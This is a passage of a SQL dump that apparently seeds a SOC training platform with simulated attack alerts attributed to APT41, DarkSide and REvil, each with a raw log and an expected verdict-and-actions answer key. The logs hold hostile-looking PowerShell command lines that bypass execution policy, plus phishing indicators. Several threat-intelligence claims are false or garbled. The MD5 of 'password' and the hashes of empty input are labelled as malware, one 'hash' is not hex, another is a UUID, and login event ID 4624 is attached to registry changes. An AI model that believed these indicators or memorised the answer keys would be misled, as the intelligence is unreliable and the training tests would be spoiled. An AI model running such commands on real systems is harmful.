Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(415, 'Persistence Mechanism Activated', 'high', 'SIEM', 'The attackers have implemented persistence mechanisms, such as scheduled tasks and registry modifications, to ensure they can regain access even if initial efforts are disrupted. A suspicious scheduled task and registry key modification were detected on the host machine. This activity aligns with known APT41 tactics.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"scheduled_task\":\"UpdateCheck\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"Updater.exe\",\"action\":\"Task Created\",\"description\":\"A new scheduled task \'UpdateCheck\' was created with a malicious binary associated with APT41.\",\"os\":\"Windows 10\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious executable used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Updater.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Executable linked to persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in previous suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(416, 'Lateral Movement Detected', 'high', 'User and Entity Behavior Analytics (UEBA)', 'APT41 is utilizing stolen credentials to move laterally across the network, targeting sensitive systems. This activity is characteristic of espionage operations and poses a significant threat to the organization\'s critical infrastructure.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.15\",\"username\":\"jdoe_admin\",\"event_type\":\"lateral_movement\",\"event_description\":\"Suspicious lateral movement detected using stolen credentials\",\"malware_hash\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"filename\":\"APT41_Tool.exe\",\"observed_activity\":[{\"action\":\"login_attempt\",\"result\":\"success\",\"target_system\":\"10.0.5.15\"},{\"action\":\"file_access\",\"result\":\"success\",\"file\":\"Sensitive_Data.xlsx\"}]}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalLogs\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b6a9e7d3c569a7b9d8970e1ab5ec9a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with APT41 lateral movement tools.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"APT41_Tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"APT41 malicious tool for network penetration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(417, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP)', 'In the final stage, the attackers attempt to exfiltrate valuable data to an external server, intending to use it for espionage purposes or to sell on the black market.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.92.220.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"action\":\"blocked\",\"alert_id\":\"DLPA123456\",\"tool_used\":\"CCleaner Supply Chain\",\"severity\":\"High\"}', '2026-01-04 04:11:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server used by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the data exfiltration attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with unauthorized data transfer attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(418, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected originating from a known malicious IP address, targeting employees to harvest credentials. The email contains a suspicious attachment and a link to a phishing site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"email_subject\":\"Urgent: Account Verification Required\",\"from_address\":\"support@secure-mail.com\",\"to_address\":\"john.doe@company.com\",\"attachment_name\":\"invoice_0923.docx\",\"attachment_hash\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"phishing_url\":\"http://malicious-verify-login.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\"}', '2026-01-04 04:13:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company employee workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f9d4ff4e12a3e47a9f7b1c256b4c033\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected in multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-verify-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Active phishing site\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"invoice_0923.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro with credential-stealing capabilities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(419, 'Malware Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The threat actors have successfully deployed malware on the compromised system to execute code that establishes a foothold within the network. This step follows the acquisition of valid credentials.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:22:35Z\",\"event_type\":\"execution\",\"source\":\"EDR\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"jdoe\",\"attacker_ip\":\"203.0.113.89\"}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_records\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified in multiple threat databases.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish foothold within the network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(420, 'Persistence Mechanism Detected', 'high', 'System Logs', 'A persistence mechanism associated with DarkSide has been detected, indicating an attempt to maintain access to the compromised system. The mechanism involves suspicious registry modifications and the presence of known malicious binaries.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"host_ip\":\"192.168.1.105\",\"user\":\"john_doe\",\"event_id\":7045,\"event_source\":\"Service Control Manager\",\"service_name\":\"DarkSideService\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\",\"md5_hash\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"attacker_ip\":\"203.0.113.45\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"DarkSideService\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\"}}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with DarkSide malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"darkside.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to DarkSide operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"clean\",\"details\":\"User associated with the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(421, 'Unauthorized Admin Access', 'high', 'Network Traffic Analysis', 'The attackers use escalated privileges to move laterally within the network, targeting systems that control pipeline operations. Network logs indicate unauthorized login attempts to admin accounts from suspicious external IPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T07:45:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"username\":\"admin_user\",\"success\":true,\"action\":\"login\",\"description\":\"Successful login using administrative credentials from external IP.\",\"alert\":\"Unauthorized Admin Access Detected\",\"hashes\":{\"sha256\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\"}}', '2026-01-04 04:13:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in connection with APT attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL),
(422, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, DarkSide attempts to exfiltrate sensitive operational data, which could be used for ransom or sold on the black market. The DLP system detected an unauthorized data transfer to an external IP address.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_hash\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"filename\":\"OperationalData_Backup.zip\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLPS-5678-EXF\"}', '2026-01-04 04:13:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious data exfiltration files.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OperationalData_Backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data being exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account potentially compromised for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(423, 'Unusual Phishing Email Detected', 'medium', 'Email Gateway Logs', 'An employee received a phishing email with a malicious attachment, indicative of REvil\'s initial access strategy. The email originated from a suspicious IP and contained a known malicious file hash.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"invoice_update.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"user\":\"j.doe\",\"message_id\":\"<20231017083245.123456@maliciousdomain.com>\"}', '2026-01-04 04:25:30', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain flagged for sending phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious document used by REvil.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_update.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern common in phishing attachments.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Internal employee targeted by phishing attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(424, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'A PowerShell script was executed on the endpoint, potentially indicating malicious activity consistent with REvil ransomware tactics. The script was observed executing commands to download additional payloads from a known malicious IP.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:27Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-3FQ7K9R\",\"user\":\"johndoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"filename\":\"malicious_script.ps1\"}', '2026-01-04 04:25:30', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with REvil ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution in user temp directory\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account on the network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(425, 'Persistence Mechanism Established', 'high', 'Registry Changes Monitoring', 'The REvil ransomware has established persistence by modifying registry keys, ensuring they retain access after a system reboot. This action is indicative of a sophisticated attack aimed at maintaining long-term access to the compromised system.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:15:45Z\",\"event_id\":\"4624\",\"event_type\":\"Registry Change Detected\",\"host\":\"compromised-host.local\",\"user\":\"administrator\",\"ip_address\":\"192.168.1.10\",\"external_ip\":\"185.92.220.65\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"registry_value\":\"C:\\\\ProgramData\\\\REvil\\\\malicious.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"description\":\"Registry key modified to establish persistence by REvil malware.\"}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server related to REvil activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with REvil ransomware executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(426, 'Lateral Movement via RDP', 'high', 'Network Traffic Analysis', 'Anomalous RDP connection detected from a known malicious IP address using stolen credentials. This activity matches the lateral movement tactics commonly associated with the REvil group, indicating an attempt to expand access within the network.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"185.92.220.25\",\"dest_ip\":\"192.168.1.10\",\"username\":\"j.doe\",\"login_method\":\"RDP\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"10\",\"status\":\"Success\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_rdp_session.exe\"}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account within the organization\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious RDP session file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(427, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The DLP system detected a large volume of sensitive data being transferred to an unauthorized external IP address. The data includes financial documents and proprietary design files. The activity is consistent with the REvil attack chain, indicating a potential preparation for ransomware deployment.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T16:42:00Z\",\"event_id\":\"EXFIL-2023-0005\",\"source_ip\":\"192.168.4.25\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"data_size\":\"2GB\",\"malware_association\":\"REvil\",\"risk_score\":85}', '2026-01-04 04:25:33', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil exfiltration 